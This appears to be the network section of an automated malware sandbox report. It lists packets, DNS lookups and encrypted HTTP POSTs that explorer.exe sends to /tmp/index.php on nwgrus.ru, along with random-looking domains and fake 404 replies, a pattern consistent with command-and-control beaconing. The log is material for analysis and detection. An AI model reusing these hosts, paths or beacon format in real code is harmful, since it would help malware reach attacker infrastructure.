Oct 12, 2024 22:30:51.645098925 CEST	50046	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:30:51.742556095 CEST	80	50046	190.147.128.172	192.168.2.4
Oct 12, 2024 22:30:51.742657900 CEST	50046	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:30:51.742774963 CEST	50046	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:30:51.742810011 CEST	50046	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:30:51.747577906 CEST	80	50046	190.147.128.172	192.168.2.4
Oct 12, 2024 22:30:51.747736931 CEST	80	50046	190.147.128.172	192.168.2.4
Oct 12, 2024 22:30:52.824522018 CEST	80	50046	190.147.128.172	192.168.2.4
Oct 12, 2024 22:30:52.824682951 CEST	80	50046	190.147.128.172	192.168.2.4
Oct 12, 2024 22:30:52.824767113 CEST	50046	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:30:52.824846983 CEST	50046	80	192.168.2.4	190.147.128.172
Oct 12, 2024 22:30:52.829699039 CEST	80	50046	190.147.128.172	192.168.2.4
Oct 12, 2024 22:31:04.780033112 CEST	50047	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:31:04.785052061 CEST	80	50047	175.119.10.231	192.168.2.4
Oct 12, 2024 22:31:04.785155058 CEST	50047	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:31:04.785314083 CEST	50047	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:31:04.785346985 CEST	50047	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:31:04.790196896 CEST	80	50047	175.119.10.231	192.168.2.4
Oct 12, 2024 22:31:04.790226936 CEST	80	50047	175.119.10.231	192.168.2.4
Oct 12, 2024 22:31:06.258120060 CEST	80	50047	175.119.10.231	192.168.2.4
Oct 12, 2024 22:31:06.258173943 CEST	80	50047	175.119.10.231	192.168.2.4
Oct 12, 2024 22:31:06.258518934 CEST	50047	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:31:06.263987064 CEST	50047	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:31:06.269501925 CEST	80	50047	175.119.10.231	192.168.2.4
Oct 12, 2024 22:31:19.243087053 CEST	50048	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:31:19.248999119 CEST	80	50048	175.119.10.231	192.168.2.4
Oct 12, 2024 22:31:19.249105930 CEST	50048	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:31:19.249269009 CEST	50048	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:31:19.249310017 CEST	50048	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:31:19.255212069 CEST	80	50048	175.119.10.231	192.168.2.4
Oct 12, 2024 22:31:19.255588055 CEST	80	50048	175.119.10.231	192.168.2.4
Oct 12, 2024 22:31:20.968141079 CEST	80	50048	175.119.10.231	192.168.2.4
Oct 12, 2024 22:31:20.968288898 CEST	80	50048	175.119.10.231	192.168.2.4
Oct 12, 2024 22:31:20.968525887 CEST	50048	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:31:20.970817089 CEST	50048	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:31:20.975636959 CEST	80	50048	175.119.10.231	192.168.2.4
Oct 12, 2024 22:31:34.606482029 CEST	50049	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:31:34.612118006 CEST	80	50049	175.119.10.231	192.168.2.4
Oct 12, 2024 22:31:34.612279892 CEST	50049	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:31:34.612454891 CEST	50049	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:31:34.612473011 CEST	50049	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:31:34.617397070 CEST	80	50049	175.119.10.231	192.168.2.4
Oct 12, 2024 22:31:34.617502928 CEST	80	50049	175.119.10.231	192.168.2.4
Oct 12, 2024 22:31:36.113661051 CEST	80	50049	175.119.10.231	192.168.2.4
Oct 12, 2024 22:31:36.114489079 CEST	80	50049	175.119.10.231	192.168.2.4
Oct 12, 2024 22:31:36.114550114 CEST	50049	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:31:36.114582062 CEST	50049	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:31:36.119816065 CEST	80	50049	175.119.10.231	192.168.2.4
Oct 12, 2024 22:31:48.989573956 CEST	50050	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:31:48.995209932 CEST	80	50050	175.119.10.231	192.168.2.4
Oct 12, 2024 22:31:48.995419025 CEST	50050	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:31:48.995564938 CEST	50050	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:31:48.995596886 CEST	50050	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:31:49.001049995 CEST	80	50050	175.119.10.231	192.168.2.4
Oct 12, 2024 22:31:49.001091003 CEST	80	50050	175.119.10.231	192.168.2.4
Oct 12, 2024 22:31:50.445827961 CEST	80	50050	175.119.10.231	192.168.2.4
Oct 12, 2024 22:31:50.445909977 CEST	80	50050	175.119.10.231	192.168.2.4
Oct 12, 2024 22:31:50.445964098 CEST	50050	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:31:50.446098089 CEST	50050	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:31:50.451061964 CEST	80	50050	175.119.10.231	192.168.2.4
Oct 12, 2024 22:32:03.959069967 CEST	50051	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:32:03.964113951 CEST	80	50051	175.119.10.231	192.168.2.4
Oct 12, 2024 22:32:03.964227915 CEST	50051	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:32:03.964360952 CEST	50051	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:32:03.964402914 CEST	50051	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:32:03.969360113 CEST	80	50051	175.119.10.231	192.168.2.4
Oct 12, 2024 22:32:03.969388962 CEST	80	50051	175.119.10.231	192.168.2.4
Oct 12, 2024 22:32:05.414036036 CEST	80	50051	175.119.10.231	192.168.2.4
Oct 12, 2024 22:32:05.414531946 CEST	80	50051	175.119.10.231	192.168.2.4
Oct 12, 2024 22:32:05.414625883 CEST	50051	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:32:05.414675951 CEST	50051	80	192.168.2.4	175.119.10.231
Oct 12, 2024 22:32:05.419831038 CEST	80	50051	175.119.10.231	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 12, 2024 22:28:31.494110107 CEST	62995	53	192.168.2.4	1.1.1.1
Oct 12, 2024 22:28:32.499870062 CEST	62995	53	192.168.2.4	1.1.1.1
Oct 12, 2024 22:28:33.513564110 CEST	62995	53	192.168.2.4	1.1.1.1
Oct 12, 2024 22:28:33.769710064 CEST	53	62995	1.1.1.1	192.168.2.4
Oct 12, 2024 22:28:33.769759893 CEST	53	62995	1.1.1.1	192.168.2.4
Oct 12, 2024 22:28:33.769789934 CEST	53	62995	1.1.1.1	192.168.2.4
Oct 12, 2024 22:29:27.878504038 CEST	50265	53	192.168.2.4	1.1.1.1
Oct 12, 2024 22:29:27.911137104 CEST	53	50265	1.1.1.1	192.168.2.4
Oct 12, 2024 22:29:27.917161942 CEST	52678	53	192.168.2.4	1.1.1.1
Oct 12, 2024 22:29:27.948661089 CEST	53	52678	1.1.1.1	192.168.2.4
Oct 12, 2024 22:30:38.213104963 CEST	58069	53	192.168.2.4	1.1.1.1
Oct 12, 2024 22:30:38.223284960 CEST	53	58069	1.1.1.1	192.168.2.4
Oct 12, 2024 22:30:38.243469954 CEST	58843	53	192.168.2.4	1.1.1.1
Oct 12, 2024 22:30:38.313920021 CEST	53	58843	1.1.1.1	192.168.2.4
Oct 12, 2024 22:30:45.817096949 CEST	51352	53	192.168.2.4	1.1.1.1
Oct 12, 2024 22:30:45.987010002 CEST	53	51352	1.1.1.1	192.168.2.4
Oct 12, 2024 22:30:45.996114969 CEST	54642	53	192.168.2.4	1.1.1.1
Oct 12, 2024 22:30:46.374330997 CEST	53	54642	1.1.1.1	192.168.2.4
Oct 12, 2024 22:30:56.804435015 CEST	51463	53	192.168.2.4	1.1.1.1
Oct 12, 2024 22:30:56.814508915 CEST	53	51463	1.1.1.1	192.168.2.4
Oct 12, 2024 22:30:56.821585894 CEST	59563	53	192.168.2.4	1.1.1.1
Oct 12, 2024 22:30:56.831568956 CEST	53	59563	1.1.1.1	192.168.2.4
Oct 12, 2024 22:31:04.636575937 CEST	62672	53	192.168.2.4	1.1.1.1
Oct 12, 2024 22:31:04.768667936 CEST	53	62672	1.1.1.1	192.168.2.4
Oct 12, 2024 22:31:09.740458012 CEST	59684	53	192.168.2.4	1.1.1.1
Oct 12, 2024 22:31:09.751693010 CEST	53	59684	1.1.1.1	192.168.2.4
Oct 12, 2024 22:31:09.777600050 CEST	52183	53	192.168.2.4	1.1.1.1
Oct 12, 2024 22:31:09.808649063 CEST	53	52183	1.1.1.1	192.168.2.4
Oct 12, 2024 22:31:22.764609098 CEST	52766	53	192.168.2.4	1.1.1.1
Oct 12, 2024 22:31:22.798492908 CEST	53	52766	1.1.1.1	192.168.2.4
Oct 12, 2024 22:31:22.810658932 CEST	61010	53	192.168.2.4	1.1.1.1
Oct 12, 2024 22:31:22.972979069 CEST	53	61010	1.1.1.1	192.168.2.4
Oct 12, 2024 22:31:36.510673046 CEST	51216	53	192.168.2.4	1.1.1.1
Oct 12, 2024 22:31:36.521195889 CEST	53	51216	1.1.1.1	192.168.2.4
Oct 12, 2024 22:31:36.534760952 CEST	49176	53	192.168.2.4	1.1.1.1
Oct 12, 2024 22:31:36.548430920 CEST	53	49176	1.1.1.1	192.168.2.4
Oct 12, 2024 22:31:49.461226940 CEST	51223	53	192.168.2.4	1.1.1.1
Oct 12, 2024 22:31:49.494296074 CEST	53	51223	1.1.1.1	192.168.2.4
Oct 12, 2024 22:31:49.568062067 CEST	51059	53	192.168.2.4	1.1.1.1
Oct 12, 2024 22:31:49.579103947 CEST	53	51059	1.1.1.1	192.168.2.4
Oct 12, 2024 22:32:03.359817028 CEST	60814	53	192.168.2.4	1.1.1.1
Oct 12, 2024 22:32:03.369863987 CEST	53	60814	1.1.1.1	192.168.2.4
Oct 12, 2024 22:32:03.403362989 CEST	61696	53	192.168.2.4	1.1.1.1
Oct 12, 2024 22:32:03.414715052 CEST	53	61696	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 12, 2024 22:28:31.494110107 CEST	192.168.2.4	1.1.1.1	0x98b1	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:32.499870062 CEST	192.168.2.4	1.1.1.1	0x98b1	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.513564110 CEST	192.168.2.4	1.1.1.1	0x98b1	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:29:27.878504038 CEST	192.168.2.4	1.1.1.1	0xbaca	Standard query (0)	ninjahallnews.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:29:27.917161942 CEST	192.168.2.4	1.1.1.1	0xc63a	Standard query (0)	fallhandbat.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:30:38.213104963 CEST	192.168.2.4	1.1.1.1	0x1c9b	Standard query (0)	ninjahallnews.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:30:38.243469954 CEST	192.168.2.4	1.1.1.1	0xbdee	Standard query (0)	fallhandbat.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:30:45.817096949 CEST	192.168.2.4	1.1.1.1	0x9961	Standard query (0)	ninjahallnews.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:30:45.996114969 CEST	192.168.2.4	1.1.1.1	0x2e21	Standard query (0)	fallhandbat.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:30:56.804435015 CEST	192.168.2.4	1.1.1.1	0x22b4	Standard query (0)	ninjahallnews.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:30:56.821585894 CEST	192.168.2.4	1.1.1.1	0xa3b6	Standard query (0)	fallhandbat.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:31:04.636575937 CEST	192.168.2.4	1.1.1.1	0xd28c	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:31:09.740458012 CEST	192.168.2.4	1.1.1.1	0xeafd	Standard query (0)	ninjahallnews.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:31:09.777600050 CEST	192.168.2.4	1.1.1.1	0x7268	Standard query (0)	fallhandbat.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:31:22.764609098 CEST	192.168.2.4	1.1.1.1	0xddd9	Standard query (0)	ninjahallnews.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:31:22.810658932 CEST	192.168.2.4	1.1.1.1	0x1aab	Standard query (0)	fallhandbat.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:31:36.510673046 CEST	192.168.2.4	1.1.1.1	0x6900	Standard query (0)	ninjahallnews.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:31:36.534760952 CEST	192.168.2.4	1.1.1.1	0x8181	Standard query (0)	fallhandbat.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:31:49.461226940 CEST	192.168.2.4	1.1.1.1	0x182b	Standard query (0)	ninjahallnews.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:31:49.568062067 CEST	192.168.2.4	1.1.1.1	0xf9a6	Standard query (0)	fallhandbat.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:32:03.359817028 CEST	192.168.2.4	1.1.1.1	0x6dd3	Standard query (0)	ninjahallnews.com	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:32:03.403362989 CEST	192.168.2.4	1.1.1.1	0x72ed	Standard query (0)	fallhandbat.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 12, 2024 22:28:33.769710064 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		190.147.128.172	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.769710064 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		187.211.161.52	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.769710064 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		154.144.253.197	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.769710064 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		189.161.95.103	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.769710064 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		123.213.233.131	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.769710064 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		123.212.43.225	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.769710064 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		201.212.52.197	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.769710064 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		220.125.3.190	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.769710064 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		185.18.245.58	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.769710064 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		201.191.99.134	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.769759893 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		190.147.128.172	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.769759893 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		187.211.161.52	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.769759893 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		154.144.253.197	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.769759893 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		189.161.95.103	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.769759893 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		123.213.233.131	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.769759893 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		123.212.43.225	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.769759893 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		201.212.52.197	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.769759893 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		220.125.3.190	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.769759893 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		185.18.245.58	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.769759893 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		201.191.99.134	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.769789934 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		190.147.128.172	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.769789934 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		187.211.161.52	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.769789934 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		154.144.253.197	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.769789934 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		189.161.95.103	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.769789934 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		123.213.233.131	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.769789934 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		123.212.43.225	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.769789934 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		201.212.52.197	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.769789934 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		220.125.3.190	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.769789934 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		185.18.245.58	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:28:33.769789934 CEST	1.1.1.1	192.168.2.4	0x98b1	No error (0)	nwgrus.ru		201.191.99.134	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:29:27.911137104 CEST	1.1.1.1	192.168.2.4	0xbaca	Name error (3)	ninjahallnews.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:29:27.948661089 CEST	1.1.1.1	192.168.2.4	0xc63a	Name error (3)	fallhandbat.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:30:38.223284960 CEST	1.1.1.1	192.168.2.4	0x1c9b	Name error (3)	ninjahallnews.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:30:38.313920021 CEST	1.1.1.1	192.168.2.4	0xbdee	Name error (3)	fallhandbat.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:30:45.987010002 CEST	1.1.1.1	192.168.2.4	0x9961	Name error (3)	ninjahallnews.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:30:46.374330997 CEST	1.1.1.1	192.168.2.4	0x2e21	Name error (3)	fallhandbat.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:30:56.814508915 CEST	1.1.1.1	192.168.2.4	0x22b4	Name error (3)	ninjahallnews.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:30:56.831568956 CEST	1.1.1.1	192.168.2.4	0xa3b6	Name error (3)	fallhandbat.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:31:04.768667936 CEST	1.1.1.1	192.168.2.4	0xd28c	No error (0)	nwgrus.ru		175.119.10.231	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:31:04.768667936 CEST	1.1.1.1	192.168.2.4	0xd28c	No error (0)	nwgrus.ru		190.147.128.172	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:31:04.768667936 CEST	1.1.1.1	192.168.2.4	0xd28c	No error (0)	nwgrus.ru		190.220.21.28	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:31:04.768667936 CEST	1.1.1.1	192.168.2.4	0xd28c	No error (0)	nwgrus.ru		190.147.2.86	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:31:04.768667936 CEST	1.1.1.1	192.168.2.4	0xd28c	No error (0)	nwgrus.ru		187.211.161.52	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:31:04.768667936 CEST	1.1.1.1	192.168.2.4	0xd28c	No error (0)	nwgrus.ru		212.112.110.243	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:31:04.768667936 CEST	1.1.1.1	192.168.2.4	0xd28c	No error (0)	nwgrus.ru		190.224.203.37	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:31:04.768667936 CEST	1.1.1.1	192.168.2.4	0xd28c	No error (0)	nwgrus.ru		186.233.231.45	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:31:04.768667936 CEST	1.1.1.1	192.168.2.4	0xd28c	No error (0)	nwgrus.ru		211.171.233.126	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:31:04.768667936 CEST	1.1.1.1	192.168.2.4	0xd28c	No error (0)	nwgrus.ru		177.222.41.236	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:31:09.751693010 CEST	1.1.1.1	192.168.2.4	0xeafd	Name error (3)	ninjahallnews.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:31:09.808649063 CEST	1.1.1.1	192.168.2.4	0x7268	Name error (3)	fallhandbat.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:31:22.798492908 CEST	1.1.1.1	192.168.2.4	0xddd9	Name error (3)	ninjahallnews.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:31:22.972979069 CEST	1.1.1.1	192.168.2.4	0x1aab	Name error (3)	fallhandbat.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:31:36.521195889 CEST	1.1.1.1	192.168.2.4	0x6900	Name error (3)	ninjahallnews.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:31:36.548430920 CEST	1.1.1.1	192.168.2.4	0x8181	Name error (3)	fallhandbat.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:31:49.494296074 CEST	1.1.1.1	192.168.2.4	0x182b	Name error (3)	ninjahallnews.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:31:49.579103947 CEST	1.1.1.1	192.168.2.4	0xf9a6	Name error (3)	fallhandbat.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:32:03.369863987 CEST	1.1.1.1	192.168.2.4	0x6dd3	Name error (3)	ninjahallnews.com	none	none	A (IP address)	IN (0x0001)	false
Oct 12, 2024 22:32:03.414715052 CEST	1.1.1.1	192.168.2.4	0x72ed	Name error (3)	fallhandbat.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

23.145.40.164

mbokbuwfpvoxbkg.com

nwgrus.ru

pixlrdkntmlnb.com

bycmgoqasptpbarq.net

mkmjhgiqxobee.com

guwkkhaqmlu.org

ipxaqeyacookwjhd.net

fjjppebnfln.com

giecrmryibj.com

ftxsovsyqtpojv.com

bdnqdofcypmiflj.com

sfxppmjegqvmfflo.net

bdvavhcwwpnmuonq.com

qvliyttnwva.com

lcuvnbvrwwue.net

xabseqytshw.com

bimvjobubxq.org

rxrarkndhoucempk.org

pkknpuucklp.org

pegvelqjknxdu.com

cgelocrsuxurnrn.net

xggjjjlvylvfsyxm.org

dpiicsehdjnbnsmw.net

rustqqxkqobo.net

fvvqfcjwkkyq.org

jskfymbttqm.com

nfmmhijnsahycef.org

gmtmmuxeespeb.net

oetcuqsferjcffw.net

ykmrlqvmvtweyurg.com

htfrpafyilhcsfrb.org

uphnbpophmmckayq.net

wygnfgjkntpabtiq.org

vhkqchnxwnhum.net

nscyrydfuavfv.com

cktuxsueygng.net

dxcesnnxlrm.com

rdmqecpndyox.com

lqwauqujlltwos.org

uciyasnlqtuqe.com

ansjcylnamd.com

xcmbohrajfpmnq.org

elwljkaryvt.org

ctivelvucvmgu.org

coulxlduqqt.net

pohgsixvlqwy.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49738	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:28:33.779191971 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mbokbuwfpvoxbkg.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 287 Host: nwgrus.ru
Oct 12, 2024 22:28:33.779207945 CEST	287	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 27 1b fe ed Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA .[k,vu'T2RkM#A2vR_U/cW9\Td<$@a6/r+r8z\'3*D7w5jbiwCPqbChn F
Oct 12, 2024 22:28:34.853705883 CEST	152	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:28:34 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 87 e8 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49739	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:28:34.871783018 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pixlrdkntmlnb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 148 Host: nwgrus.ru
Oct 12, 2024 22:28:34.872253895 CEST	148	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 65 37 af 98 Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vue7\3[`EYV7==lmR"^5.WN<<bjWh
Oct 12, 2024 22:28:36.179528952 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:28:35 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 